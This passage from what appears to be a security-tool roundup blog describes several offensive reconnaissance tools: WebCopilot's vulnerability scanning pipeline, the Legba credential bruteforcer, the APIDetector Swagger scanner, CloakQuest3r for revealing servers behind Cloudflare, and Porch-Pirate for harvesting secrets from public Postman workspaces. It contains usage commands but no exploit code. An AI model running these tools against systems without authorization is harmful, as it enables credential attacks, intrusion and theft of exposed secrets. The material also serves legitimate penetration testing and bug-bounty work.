    • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.

    Contribution:

    Want a new feature to be added?

    • Make a pull request with all the necessary details and it will be merged after a review.
    • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


    WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

    By: Zion3R


    WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

    The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.


    Features

    Usage

    g!2m0:~ webcopilot -h
                 
    ──────▄▀▄─────▄▀▄
    β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
    β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
    β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
    β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
    β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β• β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘β–‘β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
    [●] @h4r5h1t.hrs | G!2m0

    Usage:
    webcopilot -d <target>
    webcopilot -d <target> -s
    webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

    Flags:
    -d Add your target [Requried]
    -o To save outputs in folder [Default: domain.com]
    -t Number of threads [Default: 100]
    -b Add your server for BXSS [Default: False]
    -x Exclude out of scope domains [Default: False]
    -s Run only Subdomain Enumeration [Default: False]
    -h Show this help message

    Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
    Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

    Installing WebCopilot

    WebCopilot requires git to install successfully. Run the following command as a root to install webcopilot

    git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

    Tools Used:

    SubFinder β€’ Sublist3r β€’ Findomain β€’ gf β€’ OpenRedireX β€’ dnsx β€’ sqlmap β€’ gobuster β€’ assetfinder β€’ httpx β€’ kxss β€’ qsreplace β€’ Nuclei β€’ dalfox β€’ anew β€’ jq β€’ aquatone β€’ urldedupe β€’ Amass β€’ gauplus β€’ waybackurls β€’ crlfuzz

    Running WebCopilot

    To run the tool on a target, just use the following command.

    g!2m0:~ webcopilot -d bugcrowd.com

    The -o command can be used to specify an output dir.

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

    The -s command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

    The -t command can be used to add thrads to your scan for faster result.

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

    The -b command can be used for blind xss (OOB), you can get your server from xsshunter or interact

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

    The -x command can be used to exclude out of scope domains.

    g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

    Example

    Default options looks like this:

    g!2m0:~ webcopilot -d bugcrowd.com - bugcrowd
                                    ──────▄▀▄─────▄▀▄
    β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
    β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
    β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
    β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
    β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆ β–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘ β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘ β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
    [●] @h4r5h1t.hrs | G!2m0


    [❌] Warning: Use with caution. You are responsible for your own actions.
    [❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.


    Target: bugcrowd.com
    Output: /home/gizmo/targets/bugcrowd
    Threads: 100
    Server: False
    Exclude: False
    Mode: Running all Enumeration
    Time: 30-08-2021 15:10:00

    [!] Please wait while scanning...

    [●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
    [●] Subdoamin Scanned - [assetfinderβœ”] Subdomain Found: 34
    [●] Subdoamin Scanned - [sublist3rβœ”] Subdomain Found: 29
    [●] Subdoamin Scanned - [subfinderβœ”] Subdomain Found: 54
    [●] Subdoamin Scanned - [amassβœ”] Subdomain Found: 43
    [●] Subdoamin Scanned - [findomainβœ”] Subdomain Found: 27

    [●] Active Subdoamin Scanning is in progress:
    [!] Please be patient. This may take a while...
    [●] Active Subdoamin Scanned - [gobusterβœ”] Subdomain Found: 11
    [●] Active Subdoamin Scanned - [amassβœ”] Subdomain Found: 0

    [●] Subdomain Scanning: Filtering out of scope subdomains
    [●] Subdomain Scanning: Filtering Alive subdomains
    [●] Subdomain Scanning: Getting titles of valid subdomains
    [●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/

    [●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

    [●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
    [●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
    [●] Vulnerabilities Scanned - [XSSβœ”] Found: 0
    [●] Vulnerabilities Scanned - [SQLiβœ”] Found: 0
    [●] Vulnerabilities Scanned - [LFIβœ”] Found: 0
    [●] Vulnerabilities Scanned - [CRLFβœ”] Found: 0
    [●] Vulnerabilities Scanned - [SSRFβœ”] Found: 0
    [●] Vulnerabilities Scanned - [Sensitive Dataβœ”] Found: 0
    [●] Vulnerabilities Scanned - [Open redirectβœ”] Found: 0
    [●] Vulnerabilities Scanned - [Subdomain Takeoverβœ”] Found: 0
    [●] Vulnerabilities Scanned - [Nuclieβœ”] Found: 0
    [●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


    β–’β–ˆβ–€β–€β–ˆ β–ˆβ–€β–€ β–ˆβ–€β–€ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–€β–€β–ˆβ–€β–€
    β–’β–ˆβ–„β–„β–€ β–ˆβ–€β–€ β–€β–€β–ˆ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–‘β–‘β–ˆβ–‘β–‘
    β–’β–ˆβ–‘β–’β–ˆ β–€β–€β–€ β–€β–€β–€ β–‘β–€β–€β–€ β–€β–€β–€ β–‘β–‘β–€β–‘β–‘

    [+] Subdomains of bugcrowd.com
    [+] Subdomains Found: 0
    [+] Subdomains Alive: 0
    [+] Endpoints: 11032
    [+] XSS: 0
    [+] SQLi: 0
    [+] Open Redirect: 0
    [+] SSRF: 0
    [+] CRLF: 0
    [+] LFI: 0
    [+] Sensitive Data: 0
    [+] Subdomain Takeover: 0
    [+] Nuclei: 0

    Acknowledgement

    WebCopilot is inspired from Garud & Pinaak by ROX4R.

    Thanks to the authors of the tools & wordlists used in this script.

    @aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

    Warning: Developers assume no liability and are not responsible for any misuse or damage cause by this tool. So, please se with caution because you are responsible for your own actions.


    Legba - A Multiprotocol Credentials Bruteforcer / Password Sprayer And Enumerator

    By: Zion3R


    Legba is a multiprotocol credentials bruteforcer / password sprayer and enumerator built with Rust and the Tokio asynchronous runtime in order to achieve better performances and stability while consuming less resources than similar tools (see the benchmark below).

    For the building instructions, usage and the complete list of options check the project Wiki.


    Supported Protocols/Features:

    AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace), Cassandra/ScyllaDB, DNS subdomain enumeration, FTP, HTTP (basic authentication, NTLMv1, NTLMv2, multipart form, custom requests with CSRF support, files/folders enumeration, virtual host enumeration), IMAP, Kerberos pre-authentication and user enumeration, LDAP, MongoDB, MQTT, Microsoft SQL, MySQL, Oracle, PostgreSQL, POP3, RDP, Redis, SSH / SFTP, SMTP, STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ), TCP port scanning, Telnet, VNC.

    Benchmark

    Here's a benchmark of legba versus thc-hydra running some common plugins, both targeting the same test servers on localhost. The benchmark has been executed on a macOS laptop with an M1 Max CPU, using a wordlist of 1000 passwords with the correct one being on the last line. Legba was compiled in release mode, Hydra compiled and installed via brew formula.

    Far from being an exhaustive benchmark (some legba features are simply not supported by hydra, such as CSRF token grabbing), this table still gives a clear idea of how using an asynchronous runtime can drastically improve performances.

    Test Name Hydra Tasks Hydra Time Legba Tasks Legba Time
    HTTP basic auth 16 7.100s 10 1.560s (οš€ 4.5x faster)
    HTTP POST login (wordpress) 16 14.854s 10 5.045s (οš€ 2.9x faster)
    SSH 16 7m29.85s * 10 8.150s (οš€ 55.1x faster)
    MySQL 4 ** 9.819s 4 ** 2.542s (οš€ 3.8x faster)
    Microsoft SQL 16 7.609s 10 4.789s (οš€ 1.5x faster)

    * While this result would suggest a default delay between connection attempts used by Hydra. I've tried to study the source code to find such delay but to my knowledge there's none. For some reason it's simply very slow.
    ** For MySQL hydra automatically reduces the amount of tasks to 4, therefore legba's concurrency level has been adjusted to 4 as well.

    License

    Legba is released under the GPL 3 license. To see the licenses of the project dependencies, install cargo license with cargo install cargo-license and then run cargo license.



    APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

    By: Zion3R


    APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


    Features

    • Flexible Input: Accepts a single domain or a list of subdomains from a file.
    • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
    • Concurrency: Utilizes multi-threading for faster scanning.
    • Customizable Output: Save results to a file or print to stdout.
    • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
    • Custom User-Agent: Ability to specify a custom User-Agent for requests.
    • Smart Detection of False-Positives: Ability to detect most false-positives.

    Getting Started

    Prerequisites

    Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

    Installation

    Clone the APIDetector repository to your local machine using:

    git clone https://github.com/brinhosa/apidetector.git
    cd apidetector
    pip install requests

    Usage

    Run APIDetector using the command line. Here are some usage examples:

    • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

      python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
    • To scan a single domain:

      python apidetector.py -d example.com
    • To scan multiple domains from a file:

      python apidetector.py -i input_file.txt
    • To specify an output file:

      python apidetector.py -i input_file.txt -o output_file.txt
    • To use a specific number of threads:

      python apidetector.py -i input_file.txt -t 20
    • To scan with both HTTP and HTTPS protocols:

      python apidetector.py -m -d example.com
    • To run the script in quiet mode (suppress verbose output):

      python apidetector.py -q -d example.com
    • To run the script with a custom user-agent:

      python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

    Options

    • -d, --domain: Single domain to test.
    • -i, --input: Input file containing subdomains to test.
    • -o, --output: Output file to write valid URLs to.
    • -t, --threads: Number of threads to use for scanning (default is 10).
    • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
    • -q, --quiet: Disable verbose output (default mode is verbose).
    • -ua, --user-agent: Custom User-Agent string for requests.

    RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

    Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list based on potential risk levels, with similar endpoints grouped together APIDetector scans:

    1. High-Risk Endpoints (Direct API Documentation):

    • Endpoints:
      • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
    • Risk:
      • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
      • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

    2. Medium-High Risk Endpoints (API Schema/Specification):

    • Endpoints:
      • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
    • Risk:
      • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
      • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

    3. Medium Risk Endpoints (API Documentation Versions):

    • Endpoints:
      • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
    • Risk:
      • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
      • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

    4. Lower Risk Endpoints (Configuration and Resources):

    • Endpoints:
      • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
    • Risk:
      • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
      • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

    Summary:

    • Highest Risk: Directly exposing interactive API documentation interfaces.
    • Medium-High Risk: Exposing raw API schema/specification files.
    • Medium Risk: Version-specific API documentation.
    • Lower Risk: Configuration and resource files for API documentation.

    Recommendations:

    • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
    • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
    • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

    Contributing

    Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

    Legal Disclaimer

    The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

    License

    This project is licensed under the MIT License.

    Acknowledgments



    CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

    By: Zion3R


    CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


    Key Features:

    • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

    • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

    • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

    • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

    With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.

    Limitation

    infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information. 3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare. " dir="auto">
    - Still in the development phase, sometimes it can't detect the real Ip.

    - CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

    1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

    2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

    3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.

    This tool is a Proof of Concept and is for Educational Purposes Only.

    How to Use:

    1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

       git clone https://github.com/spyboy-productions/CloakQuest3r.git
      cd CloakQuest3r
      pip3 install -r requirements.txt
      python cloakquest3r.py example.com
    2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

    3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

    4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

    5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

    CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

    Run It Online:

    Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



    Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

    By: Zion3R


    Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

    Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

    • Workspaces
    • Collections
    • Requests
    • Users
    • Teams

    Installation

    python3 -m pip install porch-pirate

    Using the client

    The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

    Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

    • --globals
    • --collections
    • --requests
    • --urls
    • --dump
    • --raw
    • --curl

    Simple Search

    porch-pirate -s "coca-cola.com"

    Get Workspace Globals

    By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

    Dump Workspace

    When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

    Automatic Search and Globals Extraction

    Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

    porch-pirate -s "shopify" --globals

    Automatic Search Dump

    Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

    porch-pirate -s "coca-cola.com" --dump

    Extract URLs from Workspace

    A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

    Automatic URL Extraction

    Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

    porch-pirate -s "coca-cola.com" --urls

    Show Collections in a Workspace

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

    Show Workspace Requests

